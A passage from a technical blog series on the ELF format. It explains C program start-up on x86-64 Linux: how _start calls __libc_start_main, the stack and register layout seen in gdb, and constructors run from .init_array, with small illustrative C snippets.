<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6Jxye6q1PgAUwzvcqvHhtG5G2LT_L37MT-A9tYT81hRUHJCGXDJJZC9eeflnZjSBXhNL7iD4DfC5Mm1-5xAuF5_aDVEJHRA1KriTadrEPKjd_JOZt-Z6RIStBUowrj-IxSKFuVWLAUWM/s1600/no_main_function.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="195" data-original-width="1483" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6Jxye6q1PgAUwzvcqvHhtG5G2LT_L37MT-A9tYT81hRUHJCGXDJJZC9eeflnZjSBXhNL7iD4DfC5Mm1-5xAuF5_aDVEJHRA1KriTadrEPKjd_JOZt-Z6RIStBUowrj-IxSKFuVWLAUWM/s1600/no_main_function.png" /></a></div>
<br />
<br /></div>
<div>
When I was trying out tricks for this one I accidentally replaced the symbol for <span style="font-family: "courier new" , "courier" , monospace;">_start</span>. Just to confirm that <span style="font-family: "courier new" , "courier" , monospace;">objdump</span> completely trusts the symbol table, check out what it says about <span style="font-family: "courier new" , "courier" , monospace;">_start</span>.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeMZUikJHrSrRT101oZ8EApgWwugVz8vgygOOEl1jkUvwrMNvLR7RoSW0zUnHeoUfB6tXX4iICeV3VcK43R3Sg1u2rg9be_Ze3o_R1WScfPBUFrazGS-EfnV4PghGQ_S6TV0MMjlM2LRI/s1600/_startmistake.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="582" data-original-width="942" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeMZUikJHrSrRT101oZ8EApgWwugVz8vgygOOEl1jkUvwrMNvLR7RoSW0zUnHeoUfB6tXX4iICeV3VcK43R3Sg1u2rg9be_Ze3o_R1WScfPBUFrazGS-EfnV4PghGQ_S6TV0MMjlM2LRI/s1600/_startmistake.png" /></a></div>
<br />
<br />
Now you might wonder: if both my mistake and the previous example replace the symbol table entry for <span style="font-family: "courier new" , "courier" , monospace;">main</span>, why does the proper <span style="font-family: "courier new" , "courier" , monospace;">main</span> still get called?<br />
<br />
Well, if you look at the screenshot above you'll see the instruction encoding bytes in the second output column. Look closely at the instruction at <span style="font-family: "courier new" , "courier" , monospace;">0x40046d</span> (which reads <span style="font-family: "courier new" , "courier" , monospace;">c7 c7 30 04 40 00</span>). It shows that the address of <span style="font-family: "courier new" , "courier" , monospace;"><a href="https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-v.html">main</a></span> (<span style="font-family: "courier new" , "courier" , monospace;">0x400430</span>), which is loaded into <span style="font-family: "courier new" , "courier" , monospace;">rdi</span>, is <i>baked</i> into the binary: it is an immediate operand inside <span style="font-family: "courier new" , "courier" , monospace;">_start</span>'s own code, so it never depends on the potentially tampered symbol table. The program happily marches on calling the real main instead of the redirected one in the symbol table.<br />
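To see how main's address is baked into that instruction, here is a small decoder for the `mov rdi, imm32` form. It assumes the full encoding begins with a REX.W prefix byte 0x48 ahead of the c7 c7 30 04 40 00 quoted above, as this form normally does (REX.W, opcode C7 /0, ModRM 0xC7 selecting rdi). The function name decode_mov_rdi_imm32 is hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/* Decode `mov rdi, imm32` (48 C7 C7 imm32). On success store the
 * immediate, sign-extended to 64 bits as the CPU does, and return 0;
 * return -1 if the bytes encode something else. */
int decode_mov_rdi_imm32(const unsigned char *code, size_t len, int64_t *out)
{
    if (len < 7 || code[0] != 0x48 || code[1] != 0xc7 || code[2] != 0xc7)
        return -1;
    /* The 32-bit immediate is stored little-endian in bytes 3..6. */
    uint32_t imm = (uint32_t) code[3]
                 | (uint32_t) code[4] << 8
                 | (uint32_t) code[5] << 16
                 | (uint32_t) code[6] << 24;
    *out = (int64_t) (int32_t) imm;
    return 0;
}
```

Fed the bytes 48 c7 c7 30 04 40 00, it recovers 0x400430, the real main. No symbol table is consulted anywhere along the way.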
<br /></div>
<div>
Anyway, that's it for this post; stay tuned for the next one! I'll extend our discussion of symbols and include a breakdown of how relocations work. </div>
<h2 style="text-align: left;">
References and Reading:</h2>
<ol style="text-align: left;">
<li><a href="https://gist.github.com/DhavalKapil/2243db1b732b211d0c16fd5d9140ab0b">https://gist.github.com/DhavalKapil/2243db1b732b211d0c16fd5d9140ab0b</a></li>
<li><a href="https://www.intezer.com/executable-and-linkable-format-101-part-3-relocations/">https://www.intezer.com/executable-and-linkable-format-101-part-3-relocations/</a></li>
<li><a href="https://blogs.oracle.com/solaris/what-are-tentative-symbols-v2">https://blogs.oracle.com/solaris/what-are-tentative-symbols-v2 </a></li>
<li><a href="https://blogs.oracle.com/solaris/inside-elf-symbol-tables-v2">https://blogs.oracle.com/solaris/inside-elf-symbol-tables-v2</a></li>
<li><a href="https://wiki.osdev.org/ELF_Tutorial">https://wiki.osdev.org/ELF_Tutorial</a> </li>
<li><a href="http://web.mit.edu/freebsd/head/sys/sys/elf64.h">http://web.mit.edu/freebsd/head/sys/sys/elf64.h</a> </li>
<li><a href="https://stackoverflow.com/questions/48181509/how-to-interpret-the-st-info-field-of-elf-symbol-table-section">https://stackoverflow.com/questions/48181509/how-to-interpret-the-st-info-field-of-elf-symbol-table-section</a> </li>
<li><a href="https://binarydodo.wordpress.com/2016/05/12/symbol-binding-types-in-elf-and-their-effect-on-linking-of-relocatable-files/">https://binarydodo.wordpress.com/2016/05/12/symbol-binding-types-in-elf-and-their-effect-on-linking-of-relocatable-files/</a> </li>
<li><a href="https://stackoverflow.com/questions/12697081/what-is-gmon-start-symbol">https://stackoverflow.com/questions/12697081/what-is-gmon-start-symbol</a> </li>
<li><a href="https://en.wikipedia.org/wiki/Executable_and_Linkable_Format">https://en.wikipedia.org/wiki/Executable_and_Linkable_Format</a></li>
<li><a href="https://jvns.ca/blog/2013/12/10/day-40-learning-about-linkers/">https://jvns.ca/blog/2013/12/10/day-40-learning-about-linkers/</a> </li>
<li><a href="https://www.airs.com/blog/archives/42">https://www.airs.com/blog/archives/42</a> </li>
<li><a href="http://www.fcollyer.com/2013/01/04/elf-symbol-visibility-and-the-perils-of-name-clashing/">http://www.fcollyer.com/2013/01/04/elf-symbol-visibility-and-the-perils-of-name-clashing/</a></li>
</ol>
</div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com1tag:blogger.com,1999:blog-5845671313867906274.post-24696776858834555912018-10-06T01:29:00.003-07:002018-10-06T02:29:25.132-07:00Introduction to the ELF Format (Part V) : Understanding C start up .init_array and .fini_array sections<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
This post is part of a series on the ELF format, if you haven't checked out the other parts of the series here they are:<br />
<br />
<ol style="text-align: left;">
<li>(Part I) : ELF Header <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html</a></li>
<li> (Part II) : Program Headers <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html </a></li>
<li>(Part III) : Section Header Table <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html </a></li>
<li>(Part IV) : Section Types and Special Sections <a href="https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-iv.html">https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-iv.html</a></li>
<li>this</li>
</ol>
<br />
In this post I'm going to cover some aspects of C start up and mess around with the <span style="font-family: "courier new" , "courier" , monospace;">.init_array</span> and <span style="font-family: "courier new" , "courier" , monospace;">.fini_array</span> sections to show how they work.<br />
<br />
<h2 style="text-align: left;">
C Start Up</h2>
<br />
So something must happen to get your code in the main function running. This process is called C start up, and it essentially involves running all the initialization code, setting up pointers to some important arrays and then branching over to main.<br />
<br />
What the <span style="font-family: "courier new" , "courier" , monospace;">_start</span> function essentially needs to do is call <span style="font-family: "courier new" , "courier" , monospace;">__libc_start_main</span>, which is the function that actually calls <span style="font-family: "courier new" , "courier" , monospace;">main()</span>.<br />
<br />
Now, if you haven't guessed, this means we need to pass a pointer to the main function as an argument to <span style="font-family: "courier new" , "courier" , monospace;">__libc_start_main</span>. It takes a few other parameters too; here they are:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><b>LIBC_START_MAIN (int (*main) (int, char **, char ** MAIN_AUXVEC_DECL),</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><b><span style="white-space: pre;"> </span> int argc, char **argv,</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><b>#ifdef LIBC_START_MAIN_AUXVEC_ARG</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><b><span style="white-space: pre;"> </span> ElfW(auxv_t) *auxvec,</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><b>#endif</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><b><span style="white-space: pre;"> </span> __typeof (main) init,</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><b><span style="white-space: pre;"> </span> void (*fini) (void),</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><b><span style="white-space: pre;"> </span> void (*rtld_fini) (void), void *stack_end)</b></span><br />
<div>
<br /></div>
Update: I realized that the original version of the post had the wrong function header for <span style="font-family: "courier new" , "courier" , monospace;">__libc_start_main</span>, so I grabbed this one straight from glibc (<a href="https://github.com/lattera/glibc/blob/master/csu/libc-start.c#L129">https://github.com/lattera/glibc/blob/master/csu/libc-start.c#L129</a>)<br />
for an alternative explanation of this check out - <a href="http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html">http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html </a>(sorry no https :( <i>. . . <-- those are my tears for your unborn TLS packets *sniff snff* lol.</i><br />
<br />
So what we have here is:<br />
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;"><b><span style="font-family: "courier new" , "courier" , monospace;">int (*main)</span><span style="font-family: "courier new" , "courier" , monospace;"> </span></b></span>- no guessing here this is a pointer to the main method in the binary.</li>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>int </b></span><b style="font-family: "courier new", courier, monospace;">argc</b> - the number of arguments passed to the binary from the command line, including the binary's name (<i>we will show this later</i>). </li>
<li><b style="font-family: "courier new", courier, monospace;">char **argv</b> - the array of pointers to the argument strings. It's important to remember that argv reaches the <span style="font-family: "courier new" , "courier" , monospace;">_start</span> function on the stack, not in a register; <span style="font-family: "courier new" , "courier" , monospace;">_start</span> simply passes along a pointer to that part of the stack.</li>
<li><b><b><span style="font-family: "courier new" , "courier" , monospace;">__typeof (main) init </span></b> </b>- This is a pointer to the function (<span style="font-family: "courier new" , "courier" , monospace;">__libc_csu_init</span>) that handles calling the initializer or constructor functions. I'm going to call this a constructor function "call handler"[see footnote 1]. </li>
</ul>
<ul style="text-align: left;">
<li><b><b><span style="font-family: "courier new" , "courier" , monospace;">void (*fini) (void)</span></b> -</b> a pointer to the analogous function (<span style="font-family: "courier new" , "courier" , monospace;">__libc_csu_fini</span>) that handles calling destructor functions.</li>
<li><b><b><span style="font-family: "courier new" , "courier" , monospace;">void (*rtld_fini) (void)</span></b> - </b>The destructor function call handler for the dynamic linker. This value is passed to <span style="font-family: "courier new" , "courier" , monospace;">_start</span> in <span style="font-family: "courier new" , "courier" , monospace;">rdx</span> by the loader (<i>we will see this being used soon</i>). I <i>won't get into how this handler works too much here, it's a little off track for this discussion, but when I cover dynamic linking I'll expand on it more ;) </i></li>
<li><i><b style="font-family: "courier new", courier, monospace; font-style: normal;">void *stack_end </b><span style="font-style: normal;"><span style="font-family: inherit;">end of stack marker.</span></span></i></li>
</ul>
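The init and fini handlers above end up calling constructor and destructor functions. Here is a minimal sketch of where such functions come from. It assumes GCC or Clang, because the constructor and destructor attributes are compiler extensions rather than standard C. On typical modern Linux toolchains the compiler records pointers to these functions in .init_array and .fini_array, the sections this post is about. The names ctor_ran, before_main and after_main are hypothetical.

```c
#include <stdio.h>

/* Set by the constructor so main() can observe that it already ran. */
int ctor_ran = 0;

/* Runs before main(); its address is typically placed in .init_array. */
__attribute__((constructor))
static void before_main(void)
{
    ctor_ran = 1;
}

/* Runs after main() returns or exit() is called; typically in .fini_array. */
__attribute__((destructor))
static void after_main(void)
{
    fputs("destructor: main has returned\n", stderr);
}
```

Compiling this and running `readelf -S` on the result should show the .init_array and .fini_array sections holding these pointers.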
Just to reiterate, all of these wonderful things must be prepared by <span style="font-family: "courier new" , "courier" , monospace;">_start</span> for the call to <span style="font-family: "courier new" , "courier" , monospace;">__libc_start_main</span>, and we also know that <span style="font-family: "courier new" , "courier" , monospace;">rtld_fini</span> is passed to <span style="font-family: "courier new" , "courier" , monospace;">_start</span> in <span style="font-family: "courier new" , "courier" , monospace;">rdx</span>.<br />
<br />
Beyond that, <span style="font-family: "courier new" , "courier" , monospace;">_start</span> begins with a very helpful stack layout that makes argc and argv easy to find. Let's see how this is done in a real-world example.<br />
<h2 style="text-align: left;">
Reverse Engineering glibc _start</h2>
Here's what <span style="font-family: "courier new" , "courier" , monospace;">_start</span> looks like for one of my binaries during execution:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN3X-AE77Sj_XH9ONYfG7J6iBUx1nd4UnuhzElaZUuUusp-WR5rP5VQkqFKgVzkEGjyLFtrYyj92qW5rH74GXjSvV3Q7lKfdsmW7yAtrVXKA_zikNWJYnsLCzZUTbUhylEK7-h_XmgyEU/s1600/dl_fini+pointer.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="522" data-original-width="903" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN3X-AE77Sj_XH9ONYfG7J6iBUx1nd4UnuhzElaZUuUusp-WR5rP5VQkqFKgVzkEGjyLFtrYyj92qW5rH74GXjSvV3Q7lKfdsmW7yAtrVXKA_zikNWJYnsLCzZUTbUhylEK7-h_XmgyEU/s1600/dl_fini+pointer.png" /></a></div>
<br />
To clarify what is happening in the figure above: I've set a breakpoint on the <span style="font-family: "courier new" , "courier" , monospace;">_start</span> function, and I'm highlighting the instruction that was just executed. Note the arrow pointing at <span style="font-family: "courier new" , "courier" , monospace;">0x400455 <+5></span>: <i>gdb's arrow marks the instruction it will execute next, so everything before it has already run</i>.<br />
<br />
Digging into the assembly, the first instruction essentially clears out <span style="font-family: "courier new" , "courier" , monospace;">ebp</span>. After this it moves the pointer to <span style="font-family: "courier new" , "courier" , monospace;">rtld_fini</span> from <span style="font-family: "courier new" , "courier" , monospace;">rdx</span> to <span style="font-family: "courier new" , "courier" , monospace;">r9</span>; this already preps it for its cozy position as an argument in the important <span style="font-family: "courier new" , "courier" , monospace;">__libc_start_main</span> call. It also saves the value from being destroyed when <span style="font-family: "courier new" , "courier" , monospace;">rdx</span> is reused later on.<br />
<br />
What the screenshot above also confirms is that the <span style="font-family: "courier new" , "courier" , monospace;">rdx</span> register does indeed contain a pointer to the <span style="font-family: "courier new" , "courier" , monospace;">dl_fini</span> function. This is shown by the <span style="font-family: "courier new" , "courier" , monospace;">x/64ib $rdx </span>command, which says: "<i>disassemble 64 instructions starting at the address stored in rdx</i>" (with the <span style="font-family: "courier new" , "courier" , monospace;">i</span> format gdb ignores the unit size, so the <span style="font-family: "courier new" , "courier" , monospace;">b</span> makes no difference here; <i>if you're not super clued up on how gdb's memory examining command <span style="font-family: "courier new" , "courier" , monospace;">x/ </span>works, feel free to git guuuuuud by reading through this <a href="https://sourceware.org/gdb/onlinedocs/gdb/Memory.html">documentation</a></i>). You can of course do the same on <span style="font-family: "courier new" , "courier" , monospace;">r9</span>; at this point in execution it will show the same value - <i>I'm just picking rdx coz I'm used to dealing with it more</i>. Before we dig into this <span style="font-family: "courier new" , "courier" , monospace;">dl_fini</span> function[see footnote 1], let's look at the rest of the instructions in the <span style="font-family: "courier new" , "courier" , monospace;">_start</span> code.<br />
<br />
<br />
The next instruction, at <span style="font-family: "courier new" , "courier" , monospace;">0x400455 <+5></span>, is a <span style="font-family: "courier new" , "courier" , monospace;">pop</span> into <span style="font-family: "courier new" , "courier" , monospace;">rsi</span>, and the value it pops is <span style="font-family: "courier new" , "courier" , monospace;">argc</span> itself. How do we know this? When the program starts and <span style="font-family: "courier new" , "courier" , monospace;">_start</span> gets control (<i>under the ABI I am running - yours might differ</i>), the top of the stack holds <span style="font-family: "courier new" , "courier" , monospace;">argc</span>, followed by the <span style="font-family: "courier new" , "courier" , monospace;">argv</span> and <span style="font-family: "courier new" , "courier" , monospace;">envp </span>arrays. We can see this in the following screen dump:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjczvWdHhPpqxwsgpcUNcF4jncxWnGslX1P1bgWKk8d3US4dnTMYmStrHga2AS0kIw0P5NKvDPfepC__4bQHDInTFG2fEoVwvXqyDNYV6MrgtBFN-_Hcif5grVfm0CVaYgOhdk3CWDd4K8/s1600/_start+stack+%25282%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="634" data-original-width="1057" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjczvWdHhPpqxwsgpcUNcF4jncxWnGslX1P1bgWKk8d3US4dnTMYmStrHga2AS0kIw0P5NKvDPfepC__4bQHDInTFG2fEoVwvXqyDNYV6MrgtBFN-_Hcif5grVfm0CVaYgOhdk3CWDd4K8/s1600/_start+stack+%25282%2529.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
So from this figure we can see that the arguments passed to the binary are "<span style="font-family: "courier new" , "courier" , monospace;">1 2 3 4 5</span>". We can also see that the first entry in argv is the name of the binary itself, which means argc (the length of <span style="font-family: "courier new" , "courier" , monospace;">argv</span>) should be <span style="font-family: "courier new" , "courier" , monospace;"><b>6</b></span>, as shown at the first address on the stack, <span style="font-family: "courier new" , "courier" , monospace;">0x7fffffffddb0</span>. Next on the stack is the start of the actual <span style="font-family: "courier new" , "courier" , monospace;">argv</span> array, and after that we have a null terminator and the start of the <span style="font-family: "courier new" , "courier" , monospace;">envp</span> array.<br />
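The layout above can be modelled on a fake stack. This sketch assumes the x86-64 System V process-entry layout shown in the dump: argc, then the argv pointers, a NULL, then the envp pointers, another NULL and the auxiliary vector (not modelled here). The struct start_args and the function read_initial_stack are hypothetical. The slots are typed as char * so that argc and the pointers can share one array.

```c
#include <stddef.h>
#include <stdint.h>

struct start_args {
    long argc;
    char **argv;
    char **envp;
};

/* Mirror what _start does with the entry stack pointer `sp`. */
struct start_args read_initial_stack(char **sp)
{
    struct start_args a;
    a.argc = (long) (uintptr_t) sp[0];  /* pop rsi: argc itself, not a pointer */
    a.argv = sp + 1;                    /* mov rdx, rsp: argv begins here      */
    a.envp = a.argv + a.argc + 1;       /* skip argv[] and its NULL terminator */
    return a;
}
```

Building a fake stack for `./prog 1 2 3 4 5` with one environment string gives argc 6 and argv[6] == NULL, matching the dump above.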
<br />
Back to the <span style="font-family: "courier new" , "courier" , monospace;">_start</span> function. After the first pop off the stack, the top of the stack is the start of the <span style="font-family: "courier new" , "courier" , monospace;">argv</span> array, and at instruction <span style="font-family: "courier new" , "courier" , monospace;"><_start+6></span> we copy the stack pointer into <span style="font-family: "courier new" , "courier" , monospace;">rdx</span>, which makes it the argv pointer. After this, at the <span style="font-family: "courier new" , "courier" , monospace;"><_start+9></span> instruction, we use a bit mask to clear the low four bits of the stack pointer and then proceed to prep the call to <span style="font-family: "courier new" , "courier" , monospace;">__libc_start_main</span> (<i>the reason this is done is to make the stack 16-byte aligned, which the System V x86-64 ABI requires at a function call</i>).<br />
<br />
Once the stack is aligned, <span style="font-family: "courier new" , "courier" , monospace;">_start</span> pushes <span style="font-family: "courier new" , "courier" , monospace;">rax</span> onto the stack. From what I've read, this is purely to preserve that alignment boundary as well; the value in <span style="font-family: "courier new" , "courier" , monospace;">rax</span> isn't used and doesn't mean anything.<br />
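The alignment arithmetic is easy to check in C. This sketch assumes the instruction sequence of glibc's x86_64 _start: pop argc, AND the stack pointer with -16, then two 8-byte pushes (push rax as padding, then push rsp, which as far as I can tell passes the top of the stack as a seventh, on-stack argument). The helper names are hypothetical.

```c
#include <stdint.h>

/* Equivalent of `and rsp, 0xfffffffffffffff0`: clear the low 4 bits. */
uint64_t align_down_16(uint64_t sp)
{
    return sp & ~(uint64_t)0xF;
}

/* Stack pointer right before `call __libc_start_main`, given the stack
 * pointer after `pop rsi` removed argc. Assumed sequence: align, then
 * push rax (padding), then push rsp; each push moves rsp down 8 bytes. */
uint64_t sp_before_call(uint64_t sp_after_pop)
{
    uint64_t sp = align_down_16(sp_after_pop);
    sp -= 8; /* push rax: padding only, the value is never used */
    sp -= 8; /* push rsp */
    return sp;
}
```

With argc at 0x7fffffffddb0 as in the figure, the pop leaves rsp at 0x7fffffffddb8; aligning gives 0x7fffffffddb0, and the two pushes leave 0x7fffffffdda0, which is still a multiple of 16 at the call. Without the padding push, the single push rsp would leave the stack misaligned by 8.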
<br />
I've dumped the register values at the point where the call to <span style="font-family: "courier new" , "courier" , monospace;">__libc_start_main</span> happens, just to check what is actually being passed to it:<br />
<div>
<br /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO1ZXsslvKqSRX_uYYHKkvLXLahjsRvNJuYvpoGtrZUKu1Dql8CTXaz_SilxERPsB4afM8tkkKv2NOOq9sThclUzLpNf_dWSJJVW67WOreohGFv1D_G51n57moan_wpECqd6ohhuQPhgs/s1600/Screenshot+from+2018-10-05+14-07-36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="636" data-original-width="1233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO1ZXsslvKqSRX_uYYHKkvLXLahjsRvNJuYvpoGtrZUKu1Dql8CTXaz_SilxERPsB4afM8tkkKv2NOOq9sThclUzLpNf_dWSJJVW67WOreohGFv1D_G51n57moan_wpECqd6ohhuQPhgs/s1600/Screenshot+from+2018-10-05+14-07-36.png" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
We are clearly using the System V ABI calling convention for x86_64 here, since instead of pushing all parameters onto the stack in a given order, we do the following:</div>
<div>
<br /></div>
<div>
<blockquote class="tr_bq">
Parameters to functions are passed in the registers rdi, rsi, rdx, rcx, r8, r9, and further values are passed on the stack in reverse order.</blockquote>
</div>
<div>
<br /></div>
<div>
- <a href="https://wiki.osdev.org/System_V_ABI">https://wiki.osdev.org/System_V_ABI</a></div>
<div>
<br /></div>
<div>
And as we see the registers contain the following:</div>
<div>
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;">rdi</span> - pointer to the first instruction of the <span style="font-family: "courier new" , "courier" , monospace;">int (*main)</span> function</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">rsi</span> - <span style="font-family: "courier new" , "courier" , monospace;">argc</span> value</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">rdx</span> - <span style="font-family: "courier new" , "courier" , monospace;">argv</span> pointer</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">rcx</span> - pointer to the first instruction of <span style="font-family: "courier new" , "courier" , monospace;">__libc_csu_init</span>, the program's constructor call handler.</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">r8</span> - pointer to <span style="font-family: "courier new" , "courier" , monospace;">__libc_csu_fini</span></li>
<li><span style="font-family: "courier new" , "courier" , monospace;">r9</span> - pointer to <span style="font-family: "courier new" , "courier" , monospace;">rtld_fini</span>, the mysterious dynamic linker destructor call handler.</li>
</ul>
</div>
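To tie the register list back to C, here is the index-to-register mapping for the first six integer/pointer arguments under the System V x86_64 convention, with the __libc_start_main parameters noted in a comment. The helper is a hypothetical illustration, and the parameter names in the comment are paraphrased from glibc's csu/libc-start.c rather than copied.

```c
#include <stddef.h>

/* System V x86_64: the first six integer/pointer arguments go in these
 * registers, in order; any further arguments are passed on the stack. */
static const char *const sysv_arg_regs[6] = {"rdi", "rsi", "rdx", "rcx", "r8", "r9"};

/* Return the register for 0-based argument `index`, or NULL if that
 * argument is passed on the stack. For __libc_start_main this gives:
 *   0 main -> rdi, 1 argc -> rsi, 2 argv -> rdx,
 *   3 init (__libc_csu_init) -> rcx, 4 fini (__libc_csu_fini) -> r8,
 *   5 rtld_fini -> r9, 6 stack_end -> stack */
const char *sysv_arg_register(size_t index)
{
    return index < 6 ? sysv_arg_regs[index] : NULL;
}
```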
<div>
And in case you don't believe me, check out this dank documentation in the glibc library confirming that we reverse engineered this correctly (<i>or that it actually works as the code intends</i>), <i>coming through strong with the documentation once again [see footnote 1]</i>. The following extract is from the glibc source:<br />
<br />
<script src="https://gist.github.com/k3170makan/067d8626a6854791c4f404ae2da29705.js"></script>
<br />
There are some other interesting details to what <span style="font-family: "courier new" , "courier" , monospace;">__libc_start_main</span> does after this, some of which involve deep Elf sorcery like reading past the end of argv to find envp. There are wonderful articles on this on the <a href="http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html">internet</a>, and the <a href="https://github.com/lattera/glibc/blob/master/csu/libc-start.c#L137">code for <span style="font-family: "courier new" , "courier" , monospace;">__libc_start_main</span></a> is also available. I take it you folks would enjoy the exercise of confirming it works as described.<br />
<br />
To summarize <span style="font-family: "courier new" , "courier" , monospace;">__libc_start_main</span> and bring <span style="font-family: "courier new" , "courier" , monospace;">.init_array</span> and <span style="font-family: "courier new" , "courier" , monospace;">.fini_array</span> into context, here is some of what it does:<br />
<br />
<ul style="text-align: left;">
<li>Set up the stack guard:</li>
<ul>
<li><a href="https://github.com/lattera/glibc/blob/master/csu/libc-start.c#L205">https://github.com/lattera/glibc/blob/master/csu/libc-start.c#L205</a> </li>
<li><a href="https://github.com/lattera/glibc/blob/master/sysdeps/unix/sysv/linux/dl-osinfo.h#L51">https://github.com/lattera/glibc/blob/master/sysdeps/unix/sysv/linux/dl-osinfo.h#L51</a> </li>
</ul>
<li>Register destructors (including the one for the rtld) so they are called at exit:</li>
<ul>
<li><a href="https://github.com/lattera/glibc/blob/master/csu/libc-start.c#L238">https://github.com/lattera/glibc/blob/master/csu/libc-start.c#L238 </a></li>
<li><a href="https://github.com/lattera/glibc/blob/master/csu/libc-start.c#L248">https://github.com/lattera/glibc/blob/master/csu/libc-start.c#L248</a> </li>
</ul>
<li>Check that the standard file descriptors <span style="font-family: "courier new" , "courier" , monospace;">STDIN</span>, <span style="font-family: "courier new" , "courier" , monospace;">STDOUT</span> and <span style="font-family: "courier new" , "courier" , monospace;">STDERR</span> are set up properly:</li>
<ul>
<li><a href="https://github.com/lattera/glibc/blob/master/csu/check_fds.c#L87">https://github.com/lattera/glibc/blob/master/csu/check_fds.c#L87 </a></li>
</ul>
</ul>
<div>
<br /></div>
<div>
It does some other cool stuff too and, of course, eventually makes the call to<span style="font-family: "courier new" , "courier" , monospace;"> (*init) </span>which, in the context of <span style="font-family: "courier new" , "courier" , monospace;">__libc_start_main</span>, means <span style="font-family: "courier new" , "courier" , monospace;">__libc_csu_init.</span> This is the function that actually makes the calls to the init functions we define (<i>much like the dynamic linker code shown in the footnotes</i>). Here's confirmation of that call chain from gdb:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl4Uyizc6F4oJHEs24YUuuB-JxryMUErlZfxGDxkZ6CH-vXITCucDdou1iGQ2FX0HJYsniGVvrlbV1f9gIVVUXERAW7l6DB1qW2eE0pCP8E1h0d0eFEgLitEHgLbRRkjnJzgIsetryJN0/s1600/Screenshot+from+2018-10-05+23-42-48.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="214" data-original-width="1314" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl4Uyizc6F4oJHEs24YUuuB-JxryMUErlZfxGDxkZ6CH-vXITCucDdou1iGQ2FX0HJYsniGVvrlbV1f9gIVVUXERAW7l6DB1qW2eE0pCP8E1h0d0eFEgLitEHgLbRRkjnJzgIsetryJN0/s1600/Screenshot+from+2018-10-05+23-42-48.png" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">foo_constructor</span> is obviously our constructor, and we can see that it does indeed get called first from <span style="font-family: "courier new" , "courier" , monospace;">__libc_csu_init</span>. These constructors are stored in the section named <span style="font-family: "courier new" , "courier" , monospace;">.init_array</span>, and the analogous array for destructors is called <span style="font-family: "courier new" , "courier" , monospace;">.fini_array</span>. The next section covers how they work.</div>
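For reference, a constructor and destructor like the ones in this example can be declared with the GCC/Clang constructor and destructor function attributes, which have the compiler place pointers to them in .init_array and .fini_array. This is a minimal sketch; the function bodies and the constructor_ran flag are illustrative and not the original example's code.

```c
#include <stdio.h>

/* Set by foo_constructor, which runs (via .init_array) before main(). */
int constructor_ran = 0;

__attribute__((constructor))
static void foo_constructor(void)
{
    constructor_ran = 1;
    puts("foo_constructor: runs before main");
}

__attribute__((destructor))
static void foo_destructor(void)
{
    puts("foo_destructor: runs after main returns or exit() is called");
}
```

Compiling this into an executable and running readelf -x .init_array on it should show the constructor's address alongside frame_dummy's.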
<h2 style="text-align: left;">
.init_array and .fini_array Sections and hex sorcery</h2>
